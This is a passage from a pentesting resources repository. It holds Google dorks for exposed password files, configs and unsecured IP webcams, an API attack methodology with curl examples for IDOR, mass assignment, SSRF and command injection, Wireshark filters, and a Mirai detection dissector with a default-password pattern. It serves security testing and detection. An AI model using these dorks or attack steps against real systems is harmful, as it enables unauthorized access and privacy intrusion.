related:example.com download 114 | related:example.com profile 115 | related:example.com account 116 | related:example.com password 117 | related:example.com secure 118 | related:example.com admin 119 | related:example.com secret 120 | ``` 121 | #### Allintext: (Search for occurrences 
of all keywords in text) 122 | ``` 123 | allintext:confidential "internal use only" 124 | allintext:username filetype:log 125 | allintext:password filetype:doc 126 | allintext:email filetype:csv 127 | allintext:credentials filetype:xls 128 | ``` 129 | #### Intext: (Search for occurrences of keywords in text) 130 | ``` 131 | intext:"confidential" site:example.com 132 | intext:"username" site:example.com 133 | intext:"password" site:example.com 134 | intext:"email" site:example.com 135 | intext:"credentials" site:example.com 136 | ``` 137 | #### Allinurl: (Search for occurrences of all keywords in URL) 138 | ``` 139 | allinurl:admin login 140 | allinurl:register user 141 | allinurl:secure access 142 | allinurl:profile edit 143 | allinurl:download file 144 | ``` 145 | #### Intitle: (Search for occurrences of keywords in title) 146 | ``` 147 | intitle:"index of" passwd 148 | intitle:"index of" password 149 | intitle:"index of" config 150 | intitle:"index of" db 151 | intitle:"index of" users 152 | ``` 153 | #### Allintitle: (Search for occurrences of all keywords in title) 154 | ``` 155 | allintitle:confidential report 156 | allintitle:login page 157 | allintitle:user profile 158 | allintitle:register account 159 | allintitle:download file 160 | ``` 161 | #### Link: (Search for external links to pages) 162 | ``` 163 | link:example.com "login" 164 | link:example.com "register" 165 | link:example.com "profile" 166 | link:example.com "admin" 167 | link:example.com "password" 168 | ``` 169 | #### Numrange: (Search for specific numbers in a range) 170 | ``` 171 | numrange:1000-2000 filetype:pdf 172 | numrange:2000-3000 filetype:doc 173 | numrange:3000-4000 filetype:xls 174 | numrange:4000-5000 filetype:txt 175 | numrange:5000-6000 filetype:log 176 | ``` 177 | #### Before/After: (Search within a particular date range for any of these) 178 | ``` 179 | filetype:pdf before:2020-01-01 after:2010-01-01 180 | ``` 181 | #### Allinanchor: (Search for occurrences of all keywords in 
anchor text) 182 | ``` 183 | allinanchor:admin login 184 | allinanchor:user profile 185 | allinanchor:secure access 186 | allinanchor:download file 187 | allinanchor:register account 188 | ``` 189 | #### Inanchor: (Search for occurrences of keywords in anchor text) 190 | ``` 191 | inanchor:admin login 192 | inanchor:user profile 193 | inanchor:secure access 194 | inanchor:download file 195 | inanchor:register account 196 | ``` 197 | #### Allinpostauthor: (Search for blog posts by specific authors) 198 | ``` 199 | allinpostauthor:"admin" 200 | allinpostauthor:"user" 201 | allinpostauthor:"moderator" 202 | allinpostauthor:"guest" 203 | allinpostauthor:"support" 204 | ``` 205 | #### Inpostauthor: (Search for blog posts by specific authors) 206 | ``` 207 | inpostauthor:"admin" 208 | inpostauthor:"user" 209 | inpostauthor:"moderator" 210 | inpostauthor:"guest" 211 | inpostauthor:"support" 212 | ``` 213 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/Readme.md: -------------------------------------------------------------------------------- 1 | These dorks are for a variety of use cases. Mainly to help organizations identify any potential points of weakness that could lead to exposed data. 2 | 3 | > [!CAUTION] 4 | > ***Disclaimer: The use of these tools is strictly for legal and responsible purposes only. 
Misuse is not condoned, and any unauthorized access or disclosure of data is against the law.*** 5 | 6 | ### Other Repos 7 | 8 | - [Proviesec / google-dorks](https://github.com/Proviesec/google-dorks) Useful Google Dorks for WebSecurity and Bug Bounty 9 | - [vsec7 dork helper](https://vsec7.github.io/) Dork Helper GUI 10 | 11 | ### External Links 12 | 13 | - [Ayrix.com Dork Generator](https://ayrix.info/dorker/?q=domainnamehere) High utility dork tool, powerful web UI 14 | 15 | - [vti-dorks](https://github.com/Neo23x0/vti-dorks) Awesome VirusTotal Intelligence Search Queries 16 | 17 | 18 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/disclosurePrograms.md: -------------------------------------------------------------------------------- 1 | ``` 2 | responsible disclosure swag r=h:com 3 | responsible disclosure hall of fame 4 | responsible disclosure europe 5 | responsible disclosure white hat 6 | white hat program 7 | bug bounty program 8 | insite:"responsible disclosure" -inurl:com 9 | intext responsible disclosure 10 | site com us responsible disclosure 11 | site .nl responsible disclosure 12 | site responsible disclosure 13 | responsible disclosure:sites 14 | responsible disclosure r=h:nl 15 | responsible disclosure r=h:us 16 | responsible disclosure r=h:eu 17 | responsible disclosure bounty r=h:us 18 | responsible disclosure bounty r=h:nl 19 | responsible disclosure bounty r=h:eu 20 | responsible disclosure swag r=h:nl 21 | responsible disclosure swag r=h:uk 22 | responsible disclosure swag r=h:eu 23 | responsible disclosure reward r=h:nl 24 | responsible disclosure reward r=h:us 25 | responsible disclosure reward r=h:eu 26 | site:*.edu intext:security report vulnerability 27 | site:‪twitter.com‬ bug bounty swag/trust/report-a-vulnerability 28 | inurl:/security.txt "mailto*" -github.com -wikipedia.org -portswigger.net -magento 29 | inurl:"bug bounty" and intext:"INR" and inurl:/security 30 | inurl:"bug 
bounty" and intext:"$" and inurl:/security 31 | inurl:"bug bounty" and intext:"€" and inurl:/security 32 | intext:bounty inurl:/security 33 | intext:"BugBounty" and intext:"BTC" and intext:"reward" 34 | "If you believe you've found a security vulnerability" 35 | "Submission Form powered by Bugcrowd" -bugcrowd.com 36 | inurl:responsible-disclosure-policy 37 | inurl:/security ext:txt "contact" 38 | responsible disclosure swag r=h:gov 39 | responsible disclosure policy r=h:gov 40 | responsible disclosure reward r=h:gov 41 | responsible disclosure bounty r=h:gov 42 | responsible disclosure program r=h:gov 43 | bug bounty program r=h:gov 44 | inurl:gov responsible disclosure 45 | inurl:gov bug bounty 46 | site:*.gov intext:responsible disclosure 47 | site:*.gov intext:bug bounty 48 | responsible disclosure swag site:*.gov 49 | responsible disclosure reward site:*.gov 50 | responsible disclosure bounty site:*.gov 51 | responsible disclosure program site:*.gov 52 | bug bounty program site:*.gov 53 | responsible disclosure r=h:com 54 | responsible disclosure policy r=h:com 55 | responsible disclosure reward r=h:com 56 | responsible disclosure bounty r=h:com 57 | responsible disclosure program r=h:com 58 | bug bounty program r=h:com 59 | inurl:com responsible disclosure 60 | inurl:com bug bounty 61 | site:*.com intext:responsible disclosure 62 | site:*.com intext:bug bounty 63 | responsible disclosure swag site:*.com 64 | responsible disclosure reward site:*.com 65 | responsible disclosure bounty site:*.com 66 | responsible disclosure program site:*.com 67 | bug bounty program site:*.com 68 | ``` 69 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/webcam-otw.txt: -------------------------------------------------------------------------------- 1 | inurl:"view/index.shtml" 2 | inur1 : "MultiCameraFrame?Mode=Motion" VB Viewer inurl:/viewer/live/ja/live.html intitle: "IP CAMERA Viewer" intext: "setting | Client setting" 3 
| intitle: "Device(" AND intext: "Network Camera" AND "language:" AND "Password" 4 | intitle: "webcam 7" inurl: '/gallery .html' 5 | intitle: "Yawcam" inur1:8081 6 | inul: control/camerainfo 7 | intitle: "webcamXP 5" - download inul: "/view/view.shtml?id=" 8 | inul:/view/viewer_index.shtml 9 | intext: "powered by webcamXP 5' 10 | intitle:webcam 7 inur1:8080 -intext: 8080 11 | intitle: "Live View / -AXIS" 12 | inurl:view/view. shtml OR 13 | inurl:view/index/frame.shatml| 14 | intitle: "MJPG Live Demo" | "intext: Select preset position" 15 | allintitle:Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 "Network Camera" 16 | allintitle: Edr1680 remote viewer 17 | allintitle: EverFocus EDSR EDSR400 Applet 18 | allintitle: EDR1600 login | Welcome intitle: "BlueNet Video Viewer" 19 | intitle: "SNC-RZ30" -demo 20 | inurl:cgi-bin/guestimage.html 21 | (intitle: (EyeSpyFX|OptiCamFX) "go to camera")|(inurl:servlet/DetectBrowser) 22 | intitle: "Veo Observer XT" 23 | inurl:shtml|p1|php|htm|asp|aspx|pdf|cfm - 24 | intext: observer 25 | intitle: "iGuard Fingerprint Security System" 26 | (intitle:MOBTIX intitle: PDAS) | 27 | (intitle: MOBOTIX intitle:Seiten) | 28 | (inurl: /pda/index.html +camera) 29 | intitle: "Edr1680 remote viewer" 30 | intitle: "NetCam Live Image" - .edu - . 
gov - johnny.ihackstuff.com 31 | intitle: "INTELLINET" intitle: "IP Camera Homepage" intitle: "WEBDVR" -inurl:product -inurl: demo 32 | intitle: "Middle frame of Videoconference Management System" ext: htm 33 | intitle: "Live View / - AXIS" I inurl:view/view.shtml 34 | intitle: "AXIS 240 Camera Server" 35 | intext: "server push" -help intitle:"--- VIDEO WEB SERVER ---" 36 | intext: "Video Web Server" "Any time & Any where" username password 37 | intitle: HomeSeer.Web.Control | Home.Status.Events.Log 38 | inurl:camctrl.cgi 39 | intitle: "supervisioncam protocol" 40 | intitle: "active webcam page" 41 | -------------------------------------------------------------------------------- /resources/SDR/Frequency-Ranges.md: -------------------------------------------------------------------------------- 1 | # Common Frequency Ranges 2 | 3 | | Device Type | Frequency Range | 4 | | --- | --- | 5 | | AM Radio | 535 kHz to 1705 kHz | 6 | | FM Radio | 87.5 MHz to 108 MHz | 7 | | Public Safety Radios (e.g. Police Scanners) | VHF: 136 MHz to 174 MHz; UHF: 406 MHz to 470 MHz | 8 | | Satellite Communications | VLF: 3 kHz to 30 kHz; LF: 30 kHz to 300 kHz; MF: 300 kHz to 3 MHz; HF: 3 MHz to 30 MHz; VHF: 30 MHz to 300 MHz; UHF: 300 MHz to 3 GHz | 9 | | Global Positioning System (GPS) | L1 band: 1575.42 MHz; L2 band: 1227.60 MHz | 10 | | Microwave Ovens | 2.45 GHz | 11 | | Remote Controls | Infrared (IR): 38 kHz | 12 | | Wireless Audio | DECT: 1880 MHz to 1900 MHz; Bluetooth: 2.4 GHz | 13 | | RFID Devices | LF: 125 kHz; HF: 13.56 MHz; UHF: 860-960 MHz | 14 | | WLAN Devices | 2.4 GHz band: 2.400-2.4835 GHz; 5 GHz band: 5.150-5.350 GHz, 5.470-5.725 GHz, and 5.725-5.825 GHz | 15 | | Cellular Networks | 2G: 850 MHz or 900 MHz; 3G: 850 MHz, 900 MHz, 1700-2100 MHz, or 1900 MHz; 4G/LTE: 700 MHz, 800 MHz, 900 MHz, 1700-2100 MHz, 1900 MHz, or 2600 MHz | 16 | | BT, Bluetooth Low Energy (BTLE) Devices, Zigbeee etc. | 2.4 GHz | 17 | | Remote Keyless Entry (RKE) | 315 MHz - North America. 
433.92 MHz - Europe | 18 | | M1 Cards| 900 MHz | 19 | | Building Automation Systems (BAS) | Sub-GHz: 434 MHz, 868 MHz, 915 MHz; 2.4 GHz; 5.8 GHz | 20 | | Wireless Sensor Networks (WSN) | 433 MHz, 868 MHz, 915 MHz; 2.4 GHz | 21 | | Industrial, Scientific, and Medical (ISM) Applications | 433 MHz, 915 MHz, 2.4 GHz, 5.8 GHz | 22 | | Radio-Frequency Identification (RFID) | LF: 125 kHz; HF: 13.56 MHz; UHF: 860-960 MHz | 23 | | Near Field Communication (NFC) | 13.56 MHz | 24 | -------------------------------------------------------------------------------- /resources/SDR/airspy-flightview.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Script to start/stop Airspy & DJI Flightview. 3 | # Usage: sudo ./airspy-flightview.sh {start|stop} 4 | # start: Start all services and containers. 5 | # stop: Stop all & cleanup 6 | 7 | 8 | SERVICES=("dji-receiver.service" "djizmqtotar1090.service" "zmqtotar1090.service") 9 | COMPOSE_FILES=( 10 | "/usr/src/flightview_gui/docker-compose-airspy-adsb.yml" 11 | "/usr/src/flightview_gui/docker-compose-tar1090.yml" 12 | ) 13 | 14 | stop_services() { 15 | echo "Stopping systemd services..." 16 | for service in "${SERVICES[@]}"; do 17 | sudo systemctl stop "$service" 18 | echo "$service stopped." 19 | done 20 | 21 | echo "Stopping Docker containers..." 22 | docker-compose -f "${COMPOSE_FILES[1]}" down --remove-orphans 23 | docker-compose -f "${COMPOSE_FILES[0]}" down --remove-orphans 24 | } 25 | 26 | start_services() { 27 | for service in "${SERVICES[@]}"; do 28 | if ! systemctl is-active --quiet "$service"; then 29 | echo "$service is not running. Starting it now..." 30 | sudo systemctl start "$service" 31 | else 32 | echo "$service is running." 33 | fi 34 | done 35 | 36 | echo "Starting Docker containers using ${COMPOSE_FILES[0]}..." 37 | docker-compose -f "${COMPOSE_FILES[0]}" up -d 38 | sleep 2 39 | echo "Starting Docker containers using ${COMPOSE_FILES[1]}..." 
40 | docker-compose -f "${COMPOSE_FILES[1]}" up -d 41 | } 42 | 43 | case "$1" in 44 | start) 45 | start_services 46 | ;; 47 | stop) 48 | stop_services 49 | ;; 50 | *) 51 | echo "Usage: $0 {start|stop}" 52 | exit 1 53 | esac 54 | -------------------------------------------------------------------------------- /resources/methodology/API-Methodology.md: -------------------------------------------------------------------------------- 1 | ## API Testing Methodology 2 | 3 | 1. [Enumerate](#enumerate) 4 | 2. [Attack Authorization](#attack-authorization) 5 | 3. [Attacking Authentication](#attacking-authentication) 6 | 4. [Injection](#injection) 7 | 5. [Mass Assignment](#mass-assignment) 8 | 6. [Excessive Data Exposure](#excessive-data-exposure) 9 | 7. [SSRF](#ssrf) 10 | 8. [Chaining Vulnerabilities w/Command Injection](#chaining-vulnerabilities-wcommand-injection) 11 | 12 | ### Enumerate 13 | 14 | The process of identifying valid users, servers, network resources, and other entities in the system. 15 | - Use different user ID values to see if you can get access to data you shouldn't be able to: 16 | 17 | ```bash 18 | http://testapi.com/user?id=1 19 | http://testapi.com/user?id=2 20 | http://testapi.com/user?id=3 21 | ``` 22 | 23 | ### Attack Authorization 24 | 25 | Testing the API's authorization checks: 26 | - Try to **access a resource that is supposed to be accessible only to admin users** while authenticated as a normal user: 27 | 28 | ```bash 29 | curl -H "Authorization: Bearer userToken" http://testapi.com/admin 30 | ``` 31 | 32 | ### Attacking Authentication 33 | 34 | Attempt to bypass the API's authentication cookies, tokens etc. 35 | - Use an **expired or invalidated** session token to make requests to the API: 36 | 37 | ```bash 38 | GET /profile 39 | Authorization: Bearer expiredToken 40 | ``` 41 | 42 | ### Injection 43 | 44 | Attempting to inject malicious code or strings into the API's input fields. 
45 | - Test for SQL Injection vulnerabilities by sending SQL statements in the request data and observing the API's response: 46 | 47 | ```bash 48 | sqlmap -u "http://testapi.com/user?id=1" 49 | ``` 50 | 51 | ### Mass Assignment 52 | 53 | The vulnerability that occurs when a user is allowed to set all properties of an object, including those that should not be publicly accessible. 54 | 55 | - Try to create a new user with admin privileges by including an "isAdmin" or other properties in the request body: 56 | 57 | ```bash 58 | curl -d "username=user&password=pass&isAdmin=true" -X POST http://testapi.com/register 59 | ``` 60 | 61 | ### Excessive Data Exposure 62 | 63 | Testing the API to see if it reveals more data than necessary. 64 | - For example, a user's profile endpoint might unnecessarily include sensitive information like password hashes or security questions 65 | 66 | ```bash 67 | curl http://testapi.com/user/profile 68 | ``` 69 | 70 | ### SSRF (Server-Side Request Forgery) 71 | 72 | A vulnerability where an attacker can make the server perform requests on their behalf. 73 | - Try to get the server to make a request to an internal-only endpoint that shouldn't be accessible from outside the network: 74 | 75 | ```bash 76 | curl -d "url=http://localhost/admin" -X POST http://testapi.com/ssrf 77 | ``` 78 | 79 | ### Chaining Vulnerabilities w/Command Injection 80 | 81 | Exploiting multiple vulnerabilities in sequence to achieve a greater impact. - First exploit a file upload vulnerability to upload a malicious script, then use a command injection vulnerability to execute that script: 82 | 83 | ```bash 84 | # Upload the script 85 | POST /upload HTTP/1.1 86 | Host: testapi.com 87 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW 88 | Content-Length: ... 
89 | 90 | # Try to execute the script 91 | curl -d "command=./uploadedScript.sh" -X POST http://testapi.com/command 92 | ``` 93 | -------------------------------------------------------------------------------- /resources/methodology/ExternalPentest.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /resources/methodology/PhysicalPentest.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /resources/methodology/WebPentest.md: -------------------------------------------------------------------------------- 1 | Init commit 2 | -------------------------------------------------------------------------------- /resources/networking/Subnet-Guide.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/52021c46aa1176fcd188b489ed90117046a94bf3/resources/networking/Subnet-Guide.xlsx -------------------------------------------------------------------------------- /resources/networking/Wireshark-Filters.md: -------------------------------------------------------------------------------- 1 | # Wireshark Filter Cheatsheet 2 | 3 | ### Other Filters 4 | 5 | #### 1. 
Drone Filter - _DJI, Yuneec, Autel, Skydio, AeroVironment, Shenzhen Hubsan, and Holy Stone by MAC prefix (OUI). This assumes an Ethernet capture; for 802.11 monitor-mode captures use `wlan.sa[0:3]` in place of `eth.src[0:3]`:_ 6 | ``` 7 | (eth.src[0:3] == 34:D2:62) || (eth.src[0:3] == 48:1C:B9) || (eth.src[0:3] == 60:60:1F) || (eth.src[0:3] == E4:7A:2C) || (eth.src[0:3] == E0:B6:F5) || (eth.src[0:3] == 18:D7:93) || (eth.src[0:3] == 38:1D:14) || (eth.src[0:3] == 00:1A:F9) || (eth.src[0:3] == 98:AA:FC) || (eth.src[0:3] == 00:0C:BF) 8 | ``` 9 | 10 | ### Filter List 11 | 12 | | Filter Category | Filter Examples | Description | 13 | | --- | --- | --- | 14 | | Top Filters | ip.addr==10.10.1.1 | Filters traffic to or from the provided IP address (ip.addr matches either source or destination) | 15 | | | ip.addr==192.168.27.0/24 | Filters traffic with a source or destination inside the provided subnet | 16 | | | tcp.port==80 | Filters traffic on a specific TCP port | 17 | | | tcp.port in{80,443,8000..8005} | Filters traffic on a set or range of TCP ports | 18 | | | tcp or dns | Filters all TCP or DNS traffic | 19 | | | eth matches "London" | Filters Ethernet frames whose bytes match a regular expression (matches is a regex, contains is a literal substring) | 20 | | | !(arp or stp or lldp or cdp or eth.addr==ff:ff:ff:ff:ff:ff or tcp.port in {4433,80}) | Excludes specific types of traffic based on the provided parameters | 21 | | General Filters | http | Filters all HTTP traffic | 22 | | | dns | Filters all DNS traffic | 23 | | | ip.src==192.168.1.1 | Filters traffic from a specific source IP | 24 | | | ip.dst==192.168.1.2 | Filters traffic to a specific destination IP | 25 | | | ipv6 | Filters all IPv6 traffic | 26 | | | eth.addr==00:11:22:33:44:55 | Filters traffic based on the MAC address | 27 | | TCP Filters | tcp.port==80 | Filters TCP traffic on a specific port | 28 | | | tcp.port in {8000..8005} | Filters TCP traffic on a range of ports | 29 | | | tcp.flags.syn==1 | Filters TCP packets with the SYN flag set (this includes SYN/ACK; add tcp.flags.ack==0 to see only connection attempts) | 30 | | | tcp.flags.reset==1 | Filters TCP packets with the RESET flag set | 31 | | Frame Filters | frame.len>=100 | Filters packets based on the frame length | 32 | | | frame contains "example" | Filters packets containing a specific 
string | 33 | | IP Filters | ip.addr==192.168.1.0/24 | Filters traffic with a source or destination inside a specific subnet | 34 | | | ip.addr==192.168.1.1 && ip.addr==192.168.1.2 | Filters the whole conversation between two hosts, in both directions | 35 | | Exclusion Filters | !arp | Excludes all ARP traffic | 36 | | Novel Filters | http.request.method == "POST" | Filters HTTP POST requests | 37 | | | ssl or tls | Filters all SSL/TLS traffic (ssl is the pre-3.0 name of the tls dissector) | 38 | | | ip.addr==192.168.1.1 and http | Filters all HTTP traffic to or from a specific IP | 39 | | | dns.qry.name contains "example" | Filters DNS queries containing a specific string | 40 | | | tcp.flags.syn==1 and tcp.flags.ack==1 | Filters TCP packets with both the SYN and ACK flags set | 41 | | | icmp | Filters all ICMP traffic | 42 | | | ip.addr==192.168.1.1 and icmp | Filters all ICMP traffic to or from a specific IP | 43 | | | tcp contains "password" | Filters all TCP packets containing the word "password" | 44 | | | http.cookie contains "sessionid" | Filters all HTTP cookies containing the string "sessionid" | 45 | | | eth.dst == ff:ff:ff:ff:ff:ff | Filters all Ethernet frames with the destination MAC set to broadcast | 46 | | | dns.resp.len > 0 | Filters DNS responses with a length greater than zero | 47 | | | !(ip.addr == 192.168.1.1) | Excludes all traffic to or from a specific IP address. Do not write this as ip.addr != 192.168.1.1: in Wireshark releases before 3.6 that means "either address differs" and matches almost every packet; the negated form works in every release | 48 | | | tcp.flags.fin==1 and tcp.flags.ack==1 | Filters TCP packets with both the FIN and ACK flags set | 49 | | | http.request.uri contains "/login" | Filters HTTP requests with "/login" in the URI | 50 | | | http.response.code == 200 | Filters HTTP responses with a status code of 200 | 51 | | | tcp.len > 0 | Filters TCP packets with a length greater than zero | 52 | | | tls.record.version == 0x0303 | Filters TLS records whose record-layer version field is TLS 1.2 (0x0303). The field was called ssl.record.version before Wireshark 3.0. TLS 1.3 keeps 0x0303 in the record layer, so use the handshake supported_versions extension to tell 1.3 from 1.2 | 53 | | | http.request or http.response | Filters all HTTP requests and responses | 54 | | | udp.port == 53 | Filters all UDP traffic on port 53 | 55 | | | ip.addr == 192.168.1.1 and (tcp or udp) | Filters all TCP or UDP traffic to or from a specific IP address | 
56 | | | frame.len <= 64 | Filters all frames with a length of 64 bytes or less | 57 | | | ip.ttl <= 64 | Filters all IP packets with a TTL of 64 or less | 58 | | | tcp.window_size == 0 | Filters all TCP packets with a window size of zero | 59 | | | tcp.stream eq 1 | Filters all packets within the same TCP stream | 60 | | | http.host contains "example.com" | Filters all HTTP packets where the host field contains a specific string | 61 | 62 | | Operand | Description | 63 | | --- | --- | 64 | | == | Tests for equality | 65 | | != | Tests for inequality | 66 | | > | Tests for greater than | 67 | | < | Tests for less than | 68 | | >= | Tests for greater than or equal to | 69 | | <= | Tests for less than or equal to | 70 | | && | Logical AND. The expression "A && B" is true if both A and B are true. | 71 | | || | Logical OR. The expression "A || B" is true if either A or B, or both, are true. | 72 | | ! | Logical NOT. The expression "!A" is true if A is false. | 73 | | contains | Checks if the left operand, which must be of type string or byte array, contains the right operand, which must be of type string. | 74 | | matches | Checks if the left operand, which must be of type string or byte array, matches the right operand, which must be a regular expression. | 75 | -------------------------------------------------------------------------------- /resources/networking/detection/Readme.md: -------------------------------------------------------------------------------- 1 | ### Protocol Analysis and Detection Engineering 2 | 3 | - Wireshark dissectors 4 | - Retired scripts & tools 5 | - More to come... 
6 | -------------------------------------------------------------------------------- /resources/networking/detection/mirai.lua: -------------------------------------------------------------------------------- 1 | -- Enhanced Mirai Detection Dissector for Wireshark 2 | -- Optimized for detecting Mirai traffic patterns --[[ NOTE(review): findings are inline as NOTE(review) comments. As written the script labels ordinary traffic as Mirai far too easily and its port registration displaces the built-in HTTP/TLS/DNS dissectors; see the notes on MIRAI_PATTERNS, Mirai.dissector and the port table at the bottom. ]] 3 | 4 | Mirai = Proto("MIRAI-CNC", "Mirai CNC Protocol") 5 | 6 | -- Known Mirai characteristics (Lua string patterns, applied with string.match) 7 | local MIRAI_PATTERNS = { 8 | TELNET_USER = "^root$", 9 | TELNET_PASS = "^(admin|root|123456|password)$", --[[ NOTE(review): Lua patterns have no '|' alternation, so this matches only the literal text "admin|root|123456|password" and never a real password. Keep the candidates in a table and compare each line with == instead. ]] 10 | HTTP_HEADER = "^Mozilla/5.0 %(compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0%)$", --[[ NOTE(review): the ^ and $ anchors require the entire payload to be exactly this string; in an HTTP request the UA sits after "User-Agent: " among the other headers, so the anchored match cannot fire on real HTTP. Match the complete "User-Agent: ..." header line instead (and escape the '.' in 5.0 as %.). ]] 11 | SCANNER_PATTERN = "^.+:.+$" --[[ NOTE(review): "anything:anything" is not a Mirai signature; any text payload containing a ':' matches, every HTTP header line included. ]] 12 | } 13 | 14 | -- Known Mirai attack types 15 | local ATTACK_TYPES = { 16 | [0] = "UDP Flood", 17 | [1] = "VSE Flood", 18 | [2] = "DNS Water Torture", 19 | [3] = "SYN Flood", 20 | [4] = "ACK Flood", 21 | [5] = "STOMP Flood", 22 | [6] = "UDP Generic Flood", 23 | [7] = "HTTP Flood", 24 | [8] = "TCP Generic Flood" 25 | } 26 | 27 | -- Field definitions optimized for detection 28 | local f = Mirai.fields 29 | f.magic = ProtoField.uint16("mirai.magic", "Magic Header", base.HEX) --[[ NOTE(review): f.magic is declared but never added to the tree by the dissector. ]] 30 | f.length = ProtoField.uint16("mirai.length", "Length", base.DEC) 31 | f.attack_duration = ProtoField.uint32("mirai.attack_duration", "Attack Duration (seconds)", base.DEC) 32 | f.attack_type = ProtoField.uint8("mirai.attack_type", "Attack Type", base.DEC, ATTACK_TYPES) 33 | f.num_targets = ProtoField.uint8("mirai.num_targets", "Number of Targets", base.DEC) 34 | f.target_ip = ProtoField.ipv4("mirai.target_ip", "Target IP") 35 | f.target_port = ProtoField.uint16("mirai.target_port", "Target Port", base.DEC) 36 | f.target_subnet = ProtoField.uint8("mirai.target_subnet", "Target Subnet", base.DEC) 37 | f.payload = ProtoField.bytes("mirai.payload", "Payload") 38 | f.telnet_data = ProtoField.string("mirai.telnet_data", "Telnet Data") 39 | f.scanner_data = ProtoField.string("mirai.scanner_data", "Scanner Data") 40 | 41 | -- Enhanced expert info for detection 42 
| local expert = Proto.expert --[[ NOTE(review): Proto.expert is not a wslua API member I can find; the expert.group / expert.severity tables used on the next lines belong to the global `expert`, so this local most likely shadows it with nil and the ProtoExpert.new() calls fail as soon as the plugin loads. Delete this line and use the global. Confirm with Analyze > Reload Lua Plugins. ]] 43 | f.expert_attack = ProtoExpert.new("mirai.attack.expert", "Mirai Attack Detected", 44 | expert.group.SECURITY, expert.severity.WARN) 45 | f.expert_scan = ProtoExpert.new("mirai.scan.expert", "Mirai Scanner Activity", 46 | expert.group.SECURITY, expert.severity.NOTE) 47 | f.expert_cnc = ProtoExpert.new("mirai.cnc.expert", "Potential Mirai CNC Communication", 48 | expert.group.SECURITY, expert.severity.WARN) 49 | f.expert_bot = ProtoExpert.new("mirai.bot.expert", "Potential Mirai Bot Activity", 50 | expert.group.SECURITY, expert.severity.WARN) 51 | f.expert_bruteforce = ProtoExpert.new("mirai.bruteforce.expert", "Possible Mirai Bruteforce Attempt", 52 | expert.group.SECURITY, expert.severity.WARN) 53 | 54 | Mirai.experts = {f.expert_attack, f.expert_scan, f.expert_cnc, f.expert_bot, f.expert_bruteforce} --[[ NOTE(review): f.expert_cnc is registered here but the dissector never raises it. ]] 55 | 56 | -- Detection helper functions 57 | local function detect_telnet_pattern(payload) --[[ Returns true when any CR/LF-separated line of payload matches TELNET_USER or TELNET_PASS. NOTE(review): the whole line must match (^...$), but an interactive Telnet session typically carries one keystroke per segment with the server echoing it back, so a per-packet match will rarely see a complete "root" line; match on the reassembled stream or relax the anchors. ]] 58 | if payload then 59 | for line in payload:gmatch("[^\r\n]+") do 60 | if line:match(MIRAI_PATTERNS.TELNET_USER) or line:match(MIRAI_PATTERNS.TELNET_PASS) then 61 | return true 62 | end 63 | end 64 | end 65 | return false 66 | end 67 | 68 | local function detect_scanner_pattern(payload) --[[ Returns true when payload matches SCANNER_PATTERN (see the note on that pattern). ]] 69 | if payload and payload:match(MIRAI_PATTERNS.SCANNER_PATTERN) then 70 | return true 71 | end 72 | return false 73 | end 74 | 75 | local function detect_http_pattern(payload) --[[ Returns true when the whole payload equals HTTP_HEADER (see the note on that pattern). ]] 76 | if payload and payload:match(MIRAI_PATTERNS.HTTP_HEADER) then 77 | return true 78 | end 79 | return false 80 | end 81 | 82 | -- Main dissector function: runs for every TCP/UDP segment on the ports registered at the bottom, applies the Telnet, scanner, CNC-command and HTTP heuristics to the payload and returns true only when one of them fired. 83 | function Mirai.dissector(buffer, pinfo, tree) 84 | if buffer:len() < 4 then return false end 85 | 86 | local is_mirai = false 87 | local offset = 0 88 | local msg_length = buffer(offset, 2):uint() 89 | 90 | pinfo.cols.protocol = "Mirai CNC" 91 | local subtree = tree:add(Mirai, buffer(), "Mirai Protocol Analysis") --[[ NOTE(review): the protocol column and this subtree are set before any detection has run and the `return false` at the end does not undo them, so every packet on a registered port is labelled "Mirai CNC" and gets a Mirai subtree. Create the subtree lazily and set the column only inside the is_mirai branch. ]] 92 | 93 | -- Check for Telnet traffic (port 23) 94 | if pinfo.dst_port == 23 or pinfo.src_port == 23 then 95 | local 
payload = buffer:string() 96 | if detect_telnet_pattern(payload) then 97 | subtree:add_proto_expert_info(f.expert_bruteforce, "Possible Mirai Telnet Bruteforce") 98 | subtree:add(f.telnet_data, buffer(offset):string()) 99 | is_mirai = true 100 | end 101 | end 102 | 103 | -- Check for scanner activity --[[ NOTE(review): this branch runs for every packet whose destination is an ephemeral port, i.e. every server-to-client reply on the registered ports, and SCANNER_PATTERN matches any text containing ':', so an HTTP response carrying "Content-Type:" is flagged as Mirai scanner activity. The <= 65535 test is always true for a port number. ]] 104 | if pinfo.dst_port >= 1024 and pinfo.dst_port <= 65535 then 105 | local payload = buffer:string() 106 | if detect_scanner_pattern(payload) then 107 | subtree:add_proto_expert_info(f.expert_scan, "Mirai Scanner Activity Detected") 108 | subtree:add(f.scanner_data, buffer(offset):string()) 109 | is_mirai = true 110 | end 111 | end 112 | 113 | -- Check for CNC communication --[[ NOTE(review): the only gate is that the first two bytes, read as a big-endian length, lie between 8 and the packet length; once inside, the WARN "Attack Detected" expert fires whenever byte 6 happens to be 0-8, and the target count is trusted without a length check. Require a stricter frame shape (e.g. msg_length == buffer:len() and 8 + 7 * num_targets <= msg_length) before raising an attack expert. ]] 114 | if buffer:len() >= msg_length and msg_length >= 8 then 115 | subtree:add(f.length, msg_length) 116 | offset = offset + 2 117 | 118 | -- Attack command analysis 119 | local attack_tree = subtree:add(Mirai, buffer(offset), "Attack Analysis") 120 | local attack_duration = buffer(offset, 4):uint() 121 | attack_tree:add(f.attack_duration, attack_duration) 122 | offset = offset + 4 123 | 124 | local attack_type = buffer(offset, 1):uint() 125 | if ATTACK_TYPES[attack_type] then 126 | attack_tree:add(f.attack_type, attack_type) 127 | attack_tree:add_proto_expert_info(f.expert_attack, 128 | string.format("Mirai %s Attack Detected", ATTACK_TYPES[attack_type])) 129 | is_mirai = true 130 | end 131 | offset = offset + 1 132 